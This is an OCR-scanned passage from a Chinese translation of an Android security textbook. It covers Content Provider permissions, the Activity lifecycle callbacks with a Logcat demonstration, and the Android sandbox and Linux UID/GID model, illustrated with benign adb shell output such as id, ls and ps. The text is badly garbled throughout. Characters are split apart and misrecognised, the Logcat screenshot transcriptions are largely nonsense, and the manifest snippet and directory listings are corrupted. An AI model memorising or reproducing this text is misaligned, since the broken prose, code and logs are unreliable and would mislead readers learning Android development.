vider 访问 这 些 数据 。 虽 然 应 用 程序 可 以 使 用 Intent 共享 数据 ， 但 是 对 于 一 些 敏感 或 
持久 性 的 数据 来 说 ， 使 用 Intent 对 象 传递 并 不 合适 。 因 此 ，Content Provider 旨 在 解 
决 该 问题 。Content Provider 和 Content Provider 的 客户 端 采用 一 种 标准 的 接口 实现 数 
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据 共 享 的 安全 性 和 高 效 性 。 例 如 ，Android 系统 的 Contact Provider (联系 人 信息 提 
HEAT) o Android 系统 上 内 置 了 默认 的 联系 人 应 用 软件 ， 能 够 访问 Contact Provider, 
不 过 ， 开 发 者 也 可 以 编写 具有 不 同 UI 界面 布局 的 联系 人 应 用 程序 ， 从 Contact Pro- 
vider 获取 相同 的 数据 。 因 此 ， 任 何 应 用 程序 对 联系 人 信息 的 改动 ， 都 会 被 所 有 访 
问 Contact Provider 的 应 用 程序 获取 。 应 用 程序 可 以 通过 调用 ContentResolver( ) 函数 
访问 Content Provider 的 数据 。 

同 其 他 应 用 程序 组 件 一 样 ，Content Provider 也 需要 在 Manifest xml 文件 中 声明 。 
在 <provider > 标签 内 可 以 定义 Content Provider 的 权限 ， 如 android: readPermission 和 
android; writePermission 权限 ， 控 制 其 他 应 用 程序 组 件 能 够 在 Content Provider. 上 执行 
的 操作 类 型 。 当 应 用 程序 调用 Content. Resolver. query () 、Content. Resolver. insert( ) , 
Content. Resolver. update( ) 和 Content. Resolver. delete ( ) XX} Content. Provider 的 数 
据 进 行 操作 时 ， 系 统 会 查看 其 操作 权限 ， 没 有 权限 则 操作 请 求 被 拒绝 。 


3.2 Activity 生命 周期 


在 本 章 前 面部 分 ， 已 经 介绍 了 Activity 的 相关 内 容 ， 并 且 讨 论 了 需要 在 Activity 
中 实现 的 回调 限 数 ， 包 括 onCreate( ) 、onPause( ) , onStart( ) 、onRestart( ) onRe- 
sume( ) onStop( ) 和 onDestroy( ) 。 接 下 来 ， 本 节 将 稍 加 详细 地 介绍 一 下 Activity 的 
生命 周期 。 

如 前 所 述 ，Activity 是 与 用 户 进行 交互 的 UI 屏幕 界面 ， 应 用 程序 往往 包含 多 个 
Activity， 用 户 可 以 在 不 同 的 Activity 之 间 无 颖 地 切换 ， 也 可 以 使 用 Intent 对 象 局 
动 其 他 应 用 程序 的 Activity。 因 此 ， 了 解 Activity 的 生命 周期 至 关 重 要 。 尤 其 对 于 
应 用 开发 者 ， 需 要 实现 Activity 切换 或 终止 时 回调 的 特定 函数 的 操作 细节 。 如 采 
Activity 所 需 的 回调 函数 没有 实现 ， 很 可 能 导致 应 用 程序 出 现 性 能 和 /或 可 靠 性 方 
面 的 问题 。 

Activity 栈 用 于 维护 管理 Android 应 用 程序 的 Activity 组 件 。 用 户 在 使 用 应 用 程 
序 时 ，Activity 会 经 历 生 命 周 期 的 不 同 状 态 。 例 如 ， 新 的 Activity 启动 后 将 被 放置 在 
当前 任务 Activity 栈 的 项 部， 并 且 获 得 用 户 焦点 、 进 入 运行 状态 ， 而 之 前 的 Activity 
入 栈 ， 位 于 新 Activity 之 下 。 系 统 会 根据 Activity 的 不 同 状态 调用 Activity 生命 周期 
中 相应 的 回调 图 数 。 如 当 一 个 Activity 回 到 前 合 、 获得 用 户 焦点 时 ， 系统 将 调用 
onCreate( ) , onRestart( ) , onStart( ) 或 onResume( ) PRX, m% Activity 失去 焦点 、 
进入 后 台 时 ， 系 统 将 调用 另 一 组 回调 函数 ， 如 onPause( ) 等 。 

e 激活 /运行 状态 ， 当 Activity 进 和 屏幕 前 台 ， 并 获得 用 户 焦点 时 ， 处 于 该 状 
态 。 这 时 ，Activity 位 于 当前 任务 堆栈 的 顶部， 响应 用 户 操 作 。 

e 暂停 状态 ， 当 Activity 上 面 出 现 另 一 个 Activity， 使 其 失去 焦点 但 仍然 对 用 户 
可 见 时 ， 处 于 暂停 状态 。 在 它 之 上 的 Activity 没有 完全 覆盖 屏幕 ， 或 者 是 透明 的 ， 
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被 暂停 的 Activity 仍 保 留 着 所 有 的 状态 和 成 员 信息 ， 不 过 ， 如 果 系 统 处 于 内 存 空间 
不 足 时 ， 系 统 会 “ 杀 死 ”该 状态 Activity， 回 收 空间 资源 。 

e 停止 状态 : 当 Activity 完全 被 另 一 个 全 屏 Activity 覆盖 时 ， 处 于 停止 状态 ， 它 
仍然 保留 所 有 的 状态 和 成 员 信息 。 然 而 对 用 户 是 不 可 见 的 ， 所 以 它 的 窗口 将 被 隐 
藏 ， 在 系统 内 存 不 足 时 ， 经 常会 “ 杀 死 ”这 样 的 Activity; 

e 不 活跃 /终止 的 状态 : 当 Activity 处 于 暂停 或 终止 状态 ， 系 统 往往 会 根据 资源 
情况 “和 杀 死 ”这 样 的 Activity， 回 收 空间 资源 。 当 该 Activity 重新 启动 时 ， 需 要 重新 
初始 化 状态 和 成 员 信息 。 

Activity 生命 周期 状态 转换 流程 如 图 3.6 所 示 ， 图 中 直角 和 矩形 表示 Activity 状态 
枝 换 时 需要 实现 的 回调 晒 数 ， 圆 角 和 矩形 表示 Activity 的 不 同 状 态 。 
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[E] 3.6 Activity 生命 周期 和 回调 函数 
Activity 在 销毁 之 前 ， 可 能 会 经 历 多 次 激活 或 不 活跃 〈 和 暂停) 状态 。 每 次 切换 ， 
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系统 会 根据 Activity 的 状态 转换 调用 对 应 的 回调 函数 ， 下 面 以 三 种 时 间 顺 序 对 Ac- 
tivity 生命 8 周期 进行 分 析 。 

e 完整 生命 周期 : Activity 的 完整 生命 周期 目 第 一 次 调用 onCreate( ) 函数 开始 ， 
直到 onDestroy( ) 函数 调用 结束 ， 期 间 涉 及 了 Activity 所 有 的 状态 变换 。 在 onCreate( ) K 
数 中 ， 主 要 实现 对 Activity 的 状态 和 资源 的 配置 ， 完 成 初始 化 。 而 在 onDestroy( ) PR 
数 中 ， 主 要 实现 对 Activity 占用 资源 的 释放 。 

e 可 见 生 命 周期 : 对 应 Activity 在 屏幕 上 显示 的 这 段 时 间 ， 以 调用 onStart( ) PR 
数 开 始 ， 直 到 onStop( ) 函数 调用 结束 。 期 间 ， 尽 管 Activity 对 用 户 来 说 是 可 见 的 ， 
但 用 户 未 必 就 能 与 之 进行 交互 。 

e 前 人 台 生 命 周期 : 该 周期 内 ， 用 户 能 够 同 Activity 进行 交互 ， 以 onResume( ) PR 
数 调 用 开始 ， 直 到 onPause( ) 函数 调用 结束 。 

表 3.3 介绍 了 Activity 生命 周期 中 主要 的 回调 函数 。 


表 3.3 Activity 生命 周期 回调 函数 


AK X 说 明 
onCreate( ) Activity 第 一 次 启动 时 调用 ， 执 行 初始 化 操作 
onRestart( ) 之 前 停止 的 Activity， 回 到 屏幕 前 台 、 重 新 开始 时 调用 
onStart( ) Activity 进入 屏幕 前 台 ， 能 够 被 用 户 可 见 时 调用 
onResume( ) Activity 进入 屏幕 前 台 ， 能 够 和 用 户 交 互 时 调用 
"Y 系统 恢复 之 前 暂停 的 Activity, HA Activity 进入 暂停 状态 时 调用 ， 通 常 需要 在 该 
隧 数 中 保存 当前 操作 的 结果 
onStop( ) Activity 不 可 见 时 调用 
onDestroy( ) 系统 销毁 Activity， 释 放 资 源 时 调用 


下 面 通过 运行 一 个 应 用 程序 2 ， 查 看 并 分 析 Activity 的 生命 周期 。 为 了 让 该 应 
用 程序 能 够 将 运行 信息 输出 到 窗口 ， 作 者 对 应 用 程序 的 部 分 源码 进行 了 修 
改 。 该 应 立 用 程序 由 三 个 不 同 的 Activity ( BJ UI 屏幕 显示 界面 ) 构成 : Activity A, 
Activity B 和 Activity C， 如 图 3.7 所 示 。 用 户 可 以 使 用 界面 上 的 按钮 在 不 同 的 Activ- 
ity 之 间 切 换 ， 切 换 时 系统 将 调用 对 应 的 回调 函数 ， 并 将 之 前 运行 的 Activity EAH 
栈 。 当 然 ， 用 户 也 可 以 返回 到 之 前 运行 的 Activity 界面 。 下 面 ， 使 用 该 示例 程序 ， 
按照 如 下 顺序 切换 Activity 屏幕 显示 界面 进行 测试 : 依次 启动 Activity A, Activity B 
和 Activity C， 然 后 再 依次 返回 到 之 前 的 Activity B 和 Activity A。 通 过 Logcat 窗口 ， 
可 以 看 到 Activity 生命 周期 内 相应 函数 的 调用 信息 。 

Activity Lifecycle 应 用 程序 演示 介绍 : 

1) 由 于 Activity A 是 该 应 用 程序 的 主 Activity。 因 此 ， 当 应 用 程序 打开 时 ，Ac- 
tivity A 随 之 启动 。 如 图 3.8 所 示 ，Activity 管理 器 启动 Activity A 后 ， 该 Activity 内 


日 ”该 应 用 程序 名 为 Activity Lifecycle, 读者 可 从 developer. android. com 网 站 自行 下 载运 行 。 一 一 原 书 注 
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图 3.7 Activity Lifecycle 应 用 程序 截图 


对 应 的 回调 函数 调用 顺序 为 onCreate( ) , onStart( ) 和 onResume( ) 。 

2) 点 击 “Start B” 按 钮 ， 启 动 Activity B。 如 图 3.9 所 示 ， 查 看 Logcat 窗口 可 
JL, Activity A 先是 调用 了 onPause( ) 函数 ， 随 后 被 压 人 堆栈 。 随 即 Activity 管理 器 
启动 Activity B, onCreate( ) , onStart( ) 和 onResume( ) 函数 依次 被 调用 。 一 旦 Activ- 
ity B 进入 到 屏幕 前 台 显 示 ，Activity A 即 调用 onStop( ) 图 数 。 从 图 3. 10 中 可 见 ， 
Activity B 切换 到 Activity C 时， 函数 调用 顺序 相同 。 


$33 Android 应 用 程序 体系 结构 49 












13$ com gòis pr... IGI Sattings | Xo accaunt configured Dissbling search history. i | I j - E "E MED 
21  — »yastem procwss | AestsvityManager ! Displayed Activity com. g2oQls.android. provides. anhancedqoogiaseurch/.8 .Settingal | 1356 : = | (total Xu. MA 
31 下 ,. AzMAzsemblez ——  —  qwnerated scenline 00203077.035:0204 | 32002023 ) 00090020 t 33 Appl nS I^ at risen iere 8 in 2734146 py 
iye bem googie pr... | KmjChacaccarMap iie jeer eng i4 0 "a pe 

134 com pyle pt | EHP BEES defínil- tasma (nystem. usi) teychata werty k eS bis 二 Y oes 

Et tysten procese Assamblar — | generated i scunline 900003177. -63»18104 ; 92001231 dnsog0ue 1s Appl mm ins: at t iCad576c8-cx4S" ESO] im 723034 rx 
55 My*tem promes 'imputtanaqerifer .. | EVATTTIZS tr Om nmn- fure -ilemt zom SS Amimernal,vimu IlnporMethodC: ient df cibi Pr cut 14 64 LET (i= 20° 
:re rea | fnzütMa-stgerBer.. — PtarciMq leds on nmec-focused SANs como anároid. interea: via. EIL OOIDIEMUI ERTE 
TI c wma. r.. - | Taare tap Wc bejbcesd for 15 6 T Cs ia e CC ATA E E E 
214 com aedpoid.— rr Tsing default rez (sgsthe dec Fa yeh re queres. xcm Bin lr. : —— 2 o S B Era] 
33 —— cem aniroid 1 0.  Viewflipper updatemumnimg!) muiaiblesrrue, mStartedefalse, mOsarPrementetrue, müunningetals» - dbz 9 a = Me 

3 com andricid 1...  ViewFllpper updatenunzingi) s'isibleetrua, mitartedefalsa, mÜserbDresentetrce, 1 WA E bell 

ET wyrtem PE | Tuputtlenagarter Tess nper ce see Frog client com. rt Läkarna visu Trp to ientosrvs tP rds Lei m 
53  com.android.1...  ViewFlipper —— updateAunning|) zWVia-hlevfalse, micarcedefalse,  mÜserPresencetrue, La oe Ex ELT Land 
38 — com.andrcid i...  ViswFlipper  updeteRunningl) sUisiblaefalse, sOtertedefalse, mÜserPresentetrus, y 


er oos) M aS ntes m Rar P (emm ) «1 


AccivityMasaqnr |Srercing LE Inrwnkt ( oes 全 cazz lanaroid torent 一 








23? "com.a&Rple.a |. Mtivivyh ars i e ceres EER pP RE iden D S 
130 com examplm s. | &evivicyn Tre me : | 
Se Ditpiayeä activity com. *xacplB, android iifecycie^ -ActivityA- sa - ens 1 564 wc P^ ~ 一- m. EN Né resa 3. Led 
104 android proce.. dalvikvm cc ftesd 326a cbj3acts / RITA bytes in 130m eS 四 s NEM 4 D TS — 


3.8 Activity Lifecycle: Activity A 启动 


er Vi EXPE rt re, — À9 poem bod < PE OE ati ~ dt hani èr 





system process InputMsnegerter Start ng irpct on tar- focused client com android. internsl ieu. E 
id 5 A maita 4 














3729  com.anpdrsid.c. . | MeyCnaracverMap Eo keyboard for i i 
LE cce endosi, e MayCnarsctertlkp Using defenir te ya; /system/ust/keychars/qverty. kombin ` ad bipes C J^ 
5B com.android.i...  VieuwFlipper updatenunning!) sWUisible-true, mStarted-false, mÜserPresente-true, Rs 5 
98 com andraid.i...  ViewFlipper  updateRunninqii. mVisibleetrue, m5tartedefalse,  mÜserPresent-true, maunningefalws 

$1 system prnceas InputWanagetfat. ftarting i5put pi ren-focumed client ctm android. internal wim. EA A ego: 
sg com.android.i...  Viewrlipper updateRiunnisg!) misible-false, mStartedefalse, mÜserPresenretrus, siunnin 

38 com androidi... ViewPlipper updateRunning() sVisibls-false, SAEC iru, x 

51 system process — ActivityMansger _ Starting activity. Intent [ attmandroid ints 

268  com.example.a-.. Activity — OnCreate ufa T ANCN Rau o US AEX S 3rd cca 
28D. cem tap i [eoram E | OnStart eu ed pe RF co ctr en ra me x Te tt nim 
200 com.exampls.3... |OAerivityA | Orge nume. Ie 了 ie es wx 

5: (syecem process vj AexivitgMansger | |Displéyed accixity ET „android. teeter Merian i Eté nd, Boni, Fos me 
104 i APR GC freed 1363 objects / êb , | e j’ >i 
















A 中 T ' f sA 4 | 
ped , PN pie ~. ? ! 一 - T ce — in "Tie —— dns -— ir- "meni. cH J 
= 一 -- J > e 0 0 TS EE " — A 一 一 一 一 一 -一 TT 
200 com example. a... 2AerfeityS Tonscart i A : "m nn A IM DL 
tasted imum gut a it ——ÀÀÓQÀ ie sen — qu o guts - Bic e. cac RH -—— —i ut dti di) um dam —-— —À—À —n—ÜáÀ — «— ea im Fi" g ta e n wed 
200 coz axample.n...  ActivicysB NI LL , P 
- jet, tm "haies (vct 9n ——Á — 0 一 一 一 人 ~ 一 
51 — system process — Activis gManaqez | Displayed activity cem. exampla a 
709 SUM. ,mxampie.a... Activity | - | On£top e —— ——  "—A— M ' nad) ———DÓ ia 人 x zik d 


[d] 3.9 Activity Lifecycle; Activity B 启动 


T 下 
uyi 


————— 
pto enm ow 


s 
ystem process ——— 





[d 3. 10 Activity Lifecycle: Activity C 启动 


3) 点 击 Activity C 界面 上 的 “Finish C” 按 钮 。 如 图 3. 11 所 示 ， 首先 Activity 
C 调用 onPause( ) 函数 ， 然 后 Activity 栈 内 的 Activity B 被 启动 。 当 Activity B 回 到 屏 
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幕 前 台 时 ，Activity C 依次 调用 onStop( ) 函数 和 onDestroy( ) 函数 。 在 onDestroy( ) K 
数 中 ，Activity C 占用 的 系统 资源 被 释放 。 在 Activity B 界面 上 点 击 “Start A” 按钮 
启动 2» A 时 ， POUR ONUTTOR, 如 图 3.12 所 示 。 
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图 3. 11 Activity Lifecycle; Activity C 终止 
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图 3. 12 Activity Lifecycle: Activity A 启动 


本 章 详 细 讨 论 了 Android 应 用 程序 组 件 ， 包括 Activity, Broadcast Receiver, Content 
Provider 和 Service。 研 究 了 用 于 应 用 程序 内 部 组 件 之 间或 不 同 的 应 用 程序 之 间 实 现 交互 
的 消息 体 一 一 Intent。 随 后 ， 又 探讨 了 Activity 的 生命 周期 ， 以 及 在 Activity 内 需要 实现 
的 一 些 主要 的 回调 函数 。 通过 本 意 的 介绍 读者 应 当 能 够 了 解 主要 的 Android 应 用 程序 
组 件 、 组 件 之 间 的 交互 过 程 ， 以 及 Activity 生命 周期 内 的 主要 回调 函数 。 
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本 草 主 要 讨论 Android 系统 的 安全 机 制 ， 包 括 系统 平台 级 的 安全 机 制 和 应 用 层 
的 安全 机 制 。 通 过 第 2 和 草 的 介绍 ， 读 者 应 当 已 经 熟悉 了 Android 系统 的 体系 结构 ， 
并 且 通 过 第 3 章 的 介绍 ， 掌 握 了 Android 应 用 程序 的 基础 知识 ， 如 程序 的 组 成 模 
块 、 程 序 框架 等 。 本 草 基 于 对 上 述 Android 系统 平台 和 应 用 层 的 理解 ， 主 要 介绍 
Android 具有 的 安全 特性 ， 以 及 Android 程序 组 件 使 用 的 各 种 进程 间 通 信 ( Interpro- 
cess Communication, IPC) 机 制品。 


4.1 Android 安全 模型 


Android 系统 的 开发 人 员 已 经 在 Android 平台 的 设计 中 引入 了 安全 机 制 。 An- 
droid 系统 强制 所 有 的 Android 应 用 程序 使 用 双 层 安全 模型 。 在 Android 底层 核心 ， 
依靠 Linux 内 核 提 供 的 安全 特性 ， 即 每 一 个 Android 应 用 程序 作为 单独 的 进程 运行 ， 
其 他 进程 不 能 干扰 其 运行 ， 并 且 每 个 应 用 程序 拥有 自己 的 一 组 数据 结构 。 

在 应 用 层 ，Android 系统 采用 更 加 细 化 的 权限 设置 允许 (或 禁止 ) 应 用 程序 或 
组 件 同 其 他 应 用 程序 组 件 交 互 ， 或 对 关键 资源 的 访问 。 应 用 程序 需要 得 到 用 户 的 批 
准 才能 访问 关键 业务 ， 如 拨打 电话 、 发 送 短信 等 ， 并 且 需 要 “ 显 式 ” 地 请 求 所 需 
权限 ， 相 应 操作 才能 成 功 执行 。 默 认 情 况 下 ， 应 用 程序 不 能 执行 任何 可 能 对 其 他 应 
用 、 用 户 资料 或 系统 不 利 的 操作 ， 如 发 送 短信 息 、 读 取 联 系 人 信息 和 访问 网 络 等 。 
播放 音乐 或 浏览 照片 不 属于 上 述 操作 ， 应 用 程序 无 需 “ 显 式 ” 地 请 求 这 些 操作 的 
权限 。 应 用 程序 级 别 的 权限 设置 提供 了 一 种 对 受 限 内 容 的 访问 机 制 和 对 受 限 API 的 
调用 机 制 。 

每 一 个 Android 应 用 程序 (或 组 件 ) 都 运行 在 一 个 独立 的 Dalvik 虚拟 机 上 ， 这 
样 就 形成 了 一 个 安全 沙 箱 。 但 是 ， 不 能 假设 这 样 的 沙 箱 就 一 定 能 够 确保 安全 。 为 了 
在 嵌入 式 设 备 上 能 够 高 效 地 运行 ，Dalvik 虚拟 机 经 过 优化 后 仅 占 有 很 小 的 空间 资 
源 。 打 破 这 种 由 虚拟 机 构成 的 安全 沙 箱 并 不 是 没有 可 能 。 因 此 ， 并 不 能 完全 依 徘 它 
来 确保 安全 。 鉴 于 此 ，Android 的 权限 检查 没有 放 在 Dalvik 虚拟 机 中 实现 ， 而 是 放 
在 Linux 内 核 代码 中 ， 在 运行 时 强制 执行 。 


C 不同 的 应 用 程序 和 进程 之 间 通 过 IPC 机 制 彼 此 通信 共享 数据 或 信息 。 例 如 ， 在 Linux 系统 上 ， 信号 就 
是 一 种 IPC 通信 方式 。 一 一 原 书 注 
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在 Android 系统 的 安全 方面 ， 底 层 Linux 设备 资源 的 访问 ， 主 要 通过 验证 用 户 和 群 
组 D 来 确保 安全 。 同 时 ，Manifest 的 权限 设置 ， 又 提供 了 男 一 种 更 加 细 化 的 安全 特性 。 


4.2 Linux 权限 机 制 


Android 系统 为 每 一 个 新 安 效 的 应 用 程序 分 配 一 个 唯一 的 UID. (User ID, HA 
ID) 和 一 个 GID (Group ID ， 群 组 ID) 。 每 一 个 安装 的 应 用 程序 都 有 一 组 与 UID 和 
GID 关联 的 数据 结构 和 文件 。 只 有 应 用 程序 本 身 (通过 其 UD) 或 超级 用 户 (BD 
root 用 户 ) 具有 访问 这 些 数据 和 文件 的 权限 。 其 他 应 用 程序 不 具有 超级 用 户 的 权限 
(当然 ， 也 不 能 赋予 它们 该 权限 ) ， 因 此 不 能 访问 其 他 应 用 程序 的 文件 。 当 应 用 程 
序 需 要 同 其 他 应 用 程序 或 组 件 共享 信息 时 ， 则 通过 在 应 用 层 采 用 MAC (Mandatory 
Access Control ， 强 制 访 问 控制 ) 安全 模型 实现 ， 这 部 分 内 容 将 在 下 一 节 详 细 讨 论 。 

在 Android 系统 上 ， 两 个 应 用 程序 有 可 能 共享 同一 个 UID 或 运行 在 同一 个 进程 
中 ， 这 是 因为 它们 使 用 了 相同 的 密 钥 获得 签名 (有 关 应 用 程序 签名 的 部 分 内 容 请 
查阅 相关 内 容 ) 。 因 此 ， 对 于 应 用 程序 开发 人 员 来 说 ， 保 证 签名 密 钥 的 安全 性 至 关 
重要 。 每 一 个 Android 应 用 程序 都 在 单独 的 进程 中 运行 ， 并 且 每 一 个 进程 拥有 上 自己 
的 UD ， 这 样 就 使 应 用 程序 之 间 彼 此 沙 箱 化 。 从 而 ， 使 应 用 程序 能 够 调用 本 地 代码 
(以 及 使 用 本 地 库 ) ， 而 将 安全 问题 交 由 Android 系统 处 理 ， 无 需 担忧 安全 隐患 。 

需要 注意 的 是 ，Linux 是 一 个 多 用 户 、 多 任务 的 操作 系统 ， 而 Android 系统 面 
向 提供 单 用 户 的 体验 。 通 过 Linux 的 权限 机 制 ，Android 应 用 程序 采用 Linux 中 用 于 
多 用 户 的 安全 模型 确保 系统 安全 。 

图 4.1 所 示 截 屏 显 示 的 为 连接 到 Android 模拟 需 的 用 户 UID， 其 中 该 用 户 的 
UID 和 GID 都 为 0。 在 类 UNIX 的 环境 中 都 是 这 样 的 ， 表 示 该 用 户 为 超级 用 户 ， 相 
当 于 传统 Windows 系统 中 的 Administrator ( 系统 管理 员 )。 超 级 用 户 可 以 执行 任何 
操作 ， 访 问 所 有 的 文件 。 

需要 注意 的 是 ， 使 用 adb 工具 在 模拟 器 上 启动 的 shell 程序 2 将 赋予 用 户 root 权限 
( 即 超级 用 户 权 限 )。 然 而 ， 如 果 在 相连 接 的 手机 设备 上 重复 上 述 同样 的 测试 ， 则 
用 户 只 能 获得 “system ”或 “shell” 用 户 权 限 ， 除 非 用 户 已 经 在 该 手机 上 进行 了 


O Shell 程序 俗称 壳 〈 区 别 于 核 ) ， 是 指 “ 提 供 使 用 者 使 用 的 界面 ”的 程序 。 类 似 于 DOS 下 的 command 
和 后 来 的 cmd. exe 程序 (命令 提示 符 窗 口 ) 。 用 于 接收 用 户 命令 ， 然 后 调用 相应 的 应 用 程序 。 基 本 上 
shell 分 两 大 类 : 图形 界 面 shell 和 命令 行 式 shell。 传 统 意义 上 的 shell 指 的 是 命令 行 式 的 shell， 以 后 如 
果 不 特别 注 明 ，shell 是 指 命令 行 式 的 shell, Android 系统 Shell 程序 可 通过 adb 工具 在 相连 的 Android 
设备 或 模拟 器 上 启动 ， 作 为 设备 或 模拟 器 Android 系统 底层 Linux 内 核 最 外 面 的 一 层 ， 控 制 用 户 与 操 
作 系 统 之 间 的 交互 ， 即 等 竺 用户 输入 ， 向 操作 系统 解释 用 户 的 输入 ，、 并 且 处 理 各 种 各 样 的 操作 系统 
的 输出 结果 。 一 一 译 者 注 
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pentestusrletools-gibbons-vm-2:-$ adb shell 
# id 


uid-Qü(root) gid-O(root) 
i 





图 4.1 在 模拟 器 上 执行 id 命令 


4 


root" 处 理 。 

每 一 个 Android 系统 上 的 应 用 程序 在 /data/data 目录 下 都 有 各 自 的 文件 来。 如 
图 4.2 所 示 ， 在 /data/data 目录 下 执行 “1 -1” 命 令 ， 将 列 出 所 有 文件 夹 的 权限 、 
所 属 用 户 (UID) 和 和 群 组 (GID)， 以 及 其 他 的 细节 信息 。 从 图 中 可 见 ， 所 有 同 应 
用 程序 关联 的 文件 夹 都 有 各 上 自 的 UID ， 且 彼此 互 不 相同 。 

从 图 4.2 可 见 ， 用 户 app_l1 (也 就 是 应 用 程序 htmlviewer) 拥有 目 己 的 文件 夹 
com. android. htmlviewer。 因 此 ,没有 权限 访问 用 户 app_5 拥有 的 com. android. musice X: 
件 夹 内 部 的 文件 。 


pentestusrl&tools-gibbons-vm-2:-$ adb shell 

# cd /data/data 

# lis -I 

drwxr-x--x app.1 app. 1 2011-09-28 . com.android.htmlviewer 

drwxr-x--x app 2 app. 2 2011-09-28 ; com.android.quicksearchbox 
drwxr-x--x app.3 app. 3 2011-09-28 : com.android.defcontainer 
drwxr-X--x system X system 2011-09-28 02:52 com.android.server.vpn 

drwxr-x--x app. 5 app.5 2011-09-28 02:53 com.android.music 

drwxr-x--x app. 6 opp. 5 2011-09-28 : com.android.providers.applications 
drwxr-x--x app.7 app.7 2011-09-28 02:53 com.android.wallpaper.livepicker 
drwxr-x--x app. 8 app. 8 2011-09-28 :53 com.android. fallback 

drwxr-x--x app_9 app 9 2011-09-28 : com.svox,pico 

drwxr-x--x app 10  aoapp.10 2011-99-28 - com.android.inputmethod,lotin 
drwxr-x--x app ll  app.11 2011-99-28 - android.tts 

drwxr-x--x app 17  J2pp.12 2011-09-28 ; com.android.soundrecorder 
drwxr-x--x app. 6 app. 6 2011-09-28 02: com. android. inputmethod.pinyin 
drwxr-x--x app 0 app. 8 2011-09-28 : com. android.providers.downloads.ui 
drwxr-x--x app 人 app e 2011-09-28 , com.android, gallery 

dowxr-x--x system system 2011-09-28 r com. .android.providers.subscribedfeeds 
drwxr-x--x app 9 app 6 2011-09-28 - com.android.providers.drm 
drwxr-x--x app.i4 app 14 2011-09-28 02:53 com.android.customlocale 
drwxr-x--x app 16 app 16 2011-09-28 - com.android.spare parts 

drwxr-x--x app.17  app.17 2011-99-28 - com, android.speechrecorder 
drwxr-x--x app.18 app. 18 2011-09-28 - .android,term 

drwxr-x- app 21 app. 21 2011-09-28 : ,android.packageinstaller 
drwxr-x--x app 22 app. 22 2011-99-28 2j. .ündroid,certinstaller 
docwxr-x--x aàpp.23 app. 23 2011-09-28 :53 com.android.netspeed 

drwxr-x--x system system 2011-99-28 :53 com.oandroid.systemui 

dnrwxr - x app_6 cpp_6 2011-09- :53 com. android., contacts 

drwxr -x app ¿á opp_24 2011-99-28 02: 'om.android.protips 

drwxr -x app.25 app 25 2011 -0a-2£F :53 com,android.camera 
drwxr-x--x dpp.26  app.26 2011-99-2 2:53 com.android,sdksetup 

dnrowxr -X 

dowxr x 

drwxr-x--x system System 2011-09- ; wom. android. providers .settings 
drwxr-x--x app.5 app. 6 2011-09-28 '.android.providers.contacts 
drwxr-x--x radio rodio 2011-09-28 92: com. android, phone 


图 4.2 /data/data 目录 下 执行 ls 命令 查看 目录 所 属 关 系 


app.é? — app.27 2011-09-28 02:53 com.android.calculator? 
0Qpp.29  app.29 2011-09-28 02:53 com.android.development 





M4 Android 应 用 程序 调用 getSharedPreferences ( ) , openFileOutput ( ) 或 ope- 
nOrCreateDatabase ( ) 函数 创建 文件 时 ， 可 以 使 用 MODE_WORLD_READABLE 和 /或 
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MODE WORLD. WRITEABLE 标志 。 人 不过， 如 果 程 序 开 发 人 员 没 有 说 愤 地 设置 这 两 
个 标志 ， 则 将 会 导致 其 他 应 用 程序 能 够 读 写 该 应 用 创建 文件 ， 即 便 这 些 文件 仅 属 于 
该 应 用 程序 。 

应 用 程序 的 UID 是 该 程序 运行 时 所 在 进程 拥有 者 的 人 ， 它 可 以 访问 同属 该 
UID 的 各 种 本 地 文件 ， 而 让 其 他 的 进程 不 能 访问 这 些 文件 。 其 他 程序 只 有 通过 IPC 
机 制 才 可 以 与 其 通信 。 每 一 个 进程 在 运行 时 拥有 上 自己 的 地 址 空间 ， 以 及 堆栈 等 。 

TET UAR shell 程序 中 使 用 “ps” 命 令 ， 查 看 所 有 运行 进程 及 其 状态 信息 
截图 如 图 4.3 所 示 。 从 图 中 可 见 ， 每 一 个 进程 (也 就 是 应 用 程序 ) ee |" 
对 应 的 用 户 UID, 


app_13 3 29132 ffffffff afdéc5ic S com android. launcher 
System 3s 21392 ffffffff ofdec5ic S com.android.settings 

app. 6 18U = 76 26296 ffffffff nafdoc5lc S android.process.acore 

app 19 : 21356 ffffffff afdOc5ic S com.android,deskclock 

app 24 y9 20200 ffffffff afdOcSic 5 com.android.protips 

app 5 é 20 20444 ffFfffff afdOcSic S com.android,music 

app. 2 2 21192 ffffffff afdOcSic S com.aondroid.auicksearchbox 
app MN 9 37 21728 ffffffff afdOc5lc S com.android.mms 
app. 28 | 3 72 22896 ffffffff afdOc5lc S com,android.email 
root : 732 344 . c003da38 ofdec3oc S /Ssystem/bin/sh 
app. 36 5 AN 23728 ffffffff ofdec5ic S com.mj.iCalendar 
root 35: 324 00000000 afdðb45c R ps 


5 
S 
5 
app_g 23i 3: 22428 ffffffff ofdOc51c 5 android.process.media 
M 
5 
5 





图 4.3 使 用 “ps” 命 令 显 示 进 程 所 属 关 系 


com. mj. iCalender 进程 所 属 的 用 户 是 app 36， 其 UID 为 36。 该 用 户 名 及 其 UID 
是 iCalender 应 用 程序 在 安 逆 时， 由 安 狗 进程 分 配 的 。 此 外 ， 还 有 很 多 的 进程 属于 
root 或 system 用 户 ， 也 就 是 超级 用 户 或 系统 用 户 。root 用 户 管 理 后 人 台 进 程 ， 如 init 
进程 等 ; system 用 户 管 理 服务 管理 冀 进 程 。 这 些 特殊 的 进程 用 于 提供 和 管理 各 种 
Android 功能 ， 因 此 ， 这 些 进程 不 能 被 普通 用 户 访 问 和 控制 。 

在 Manifest 文件 中 ， 应 用 程序 可 以 使 用 “android :shareUserId” 属性 请 求 同 其 
他 应 用 程序 共享 UID, ， 如 果 应 用 程序 同 被 共享 UID 的 应 用 程序 使 用 相同 的 证 书签 
名 ， 则 Android 系统 允许 该 请 求 。Manifest 文件 中 共享 同一 个 UID 的 代码 如 下 : 


«manifest xmlns:android-"http://schemas.android.com/apk/ 
res/android" 
package-"com.example.android.foo" 


«/manifest» 


4.3 Android Manifest 权限 


Linux 内 核 通过 将 不 同 的 应 用 程序 沙 箱 化 ， 阻 止 它们 互相 访问 各 自 的 数据 或 用 
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户 信息 ， 阻 止 对 诸如 访问 互联 网 、 拨 打 电 话 、 
接受 短信 等 敏感 操作 的 执行 。 如 果 应 用 程序 需 
要 执行 上 述 敏感 操作 〈 如 访问 互联 网 ) ， 读 取 
用 户 信息 〈 如 联系 人 信息 ) ， 或 同 其 他 应 用 程 
序 通信 (如同 电子 邮件 应 用 通信 )， 则 需 在 
MAC 模型 下 请 求 这 些 权 限 ， 即 应 用 程序 在 其 配 
